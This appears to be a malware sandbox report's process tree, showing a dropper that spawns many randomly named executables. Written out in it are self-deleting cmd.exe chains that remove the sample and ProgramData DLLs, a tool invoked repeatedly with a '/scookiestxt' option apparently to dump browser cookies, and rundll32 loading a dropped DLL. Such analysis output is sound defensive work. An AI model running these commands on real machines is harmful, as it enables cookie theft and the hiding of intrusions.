                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5492 /prefetch:8
                                                                                                                    8⤵
                                                                                                                      PID:3948
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                                                      8⤵
                                                                                                                        PID:3152
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
                                                                                                                        8⤵
                                                                                                                          PID:4584
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1840 /prefetch:8
                                                                                                                          8⤵
                                                                                                                            PID:4844
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:5672
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5124 /prefetch:8
                                                                                                                              8⤵
                                                                                                                                PID:4816
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:8
                                                                                                                                8⤵
                                                                                                                                  PID:2348
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1448 /prefetch:8
                                                                                                                                  8⤵
                                                                                                                                    PID:4292
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
                                                                                                                                    8⤵
                                                                                                                                      PID:5368
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5168 /prefetch:8
                                                                                                                                      8⤵
                                                                                                                                        PID:5436
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5176 /prefetch:8
                                                                                                                                        8⤵
                                                                                                                                          PID:5808
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:8
                                                                                                                                          8⤵
                                                                                                                                            PID:6108
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:8
                                                                                                                                            8⤵
                                                                                                                                              PID:5272
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1668 /prefetch:8
                                                                                                                                              8⤵
                                                                                                                                                PID:5220
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4300 /prefetch:8
                                                                                                                                                8⤵
                                                                                                                                                  PID:5228
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:8
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6140
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5428 /prefetch:8
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6112
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
                                                                                                                                                      8⤵
                                                                                                                                                        PID:4680
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:8
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5252
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3148 /prefetch:8
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5868
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5500 /prefetch:8
                                                                                                                                                            8⤵
                                                                                                                                                              PID:4468
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4220 /prefetch:8
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4364
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2412
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3716 /prefetch:8
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:4252
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3536 /prefetch:8
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5596
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:8
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:3084
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1404 /prefetch:8
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:5260
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4808
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:1280
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:6132
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5176 /prefetch:8
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5968
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:8
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:5712
                                                                                                                                                                              • C:\Users\Admin\Documents\f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\f63HbxfV2WYcYU58wgLyTehf.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                PID:516
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:4424
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1326211188.exe
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5004
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:3152
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:732
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1200473737.exe
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2100
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 24
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:5292
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\Documents\f63HbxfV2WYcYU58wgLyTehf.exe & exit
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:6108
                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                        ping 0
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                        PID:2436
                                                                                                                                                                                  • C:\Users\Admin\Documents\dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\dbQ3iIm0h1LDkWoDgn5v_vH9.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:1256
                                                                                                                                                                                    • C:\Users\Admin\Documents\dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                      "{path}"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4984
                                                                                                                                                                                  • C:\Users\Admin\Documents\2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\2aNJWnHICffmGqno89GuHbVV.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4224
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 656
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:1608
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 668
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4552
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 768
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:2416
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 804
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4156
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1076
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:64
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1276
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4024
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1252
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:760
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1252
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4196
                                                                                                                                                                                  • C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:4584
                                                                                                                                                                                    • C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:3644
                                                                                                                                                                                  • C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:4168
                                                                                                                                                                                    • C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      PID:5164
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im BN2v6gd1v89066wDB6eRa3Rp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\BN2v6gd1v89066wDB6eRa3Rp.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:4108
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill /im BN2v6gd1v89066wDB6eRa3Rp.exe /f
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:5432
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:5260
                                                                                                                                                                                    • C:\Users\Admin\Documents\VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\VpYfqWTsvrvmk4DESisFXHov.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      PID:4188
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im VpYfqWTsvrvmk4DESisFXHov.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VpYfqWTsvrvmk4DESisFXHov.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:4276
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill /im VpYfqWTsvrvmk4DESisFXHov.exe /f
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:3084
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:4352
                                                                                                                                                                                      • C:\Users\Admin\Documents\vt_ASiQuT3fR9eoJIz5PVk6E.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\vt_ASiQuT3fR9eoJIz5PVk6E.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4852
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 920
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:4408
                                                                                                                                                                                      • C:\Users\Admin\Documents\1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\1um0tg3NcHdOWZT14jfQXEXD.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:4848
                                                                                                                                                                                      • C:\Users\Admin\Documents\6y5Asuc92ZuzKRh2hOocPm4U.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\6y5Asuc92ZuzKRh2hOocPm4U.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        PID:4720
                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5148
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5640
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2348
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4220
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:4136
                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            PID:5172
                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            PID:5156
                                                                                                                                                                                            • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                                              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:5364
                                                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5140
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                      PID:1300
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_7.exe
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:848
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_7.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_7.exe
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:184
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                      PID:2288
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_4.exe
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:728
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:2452
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
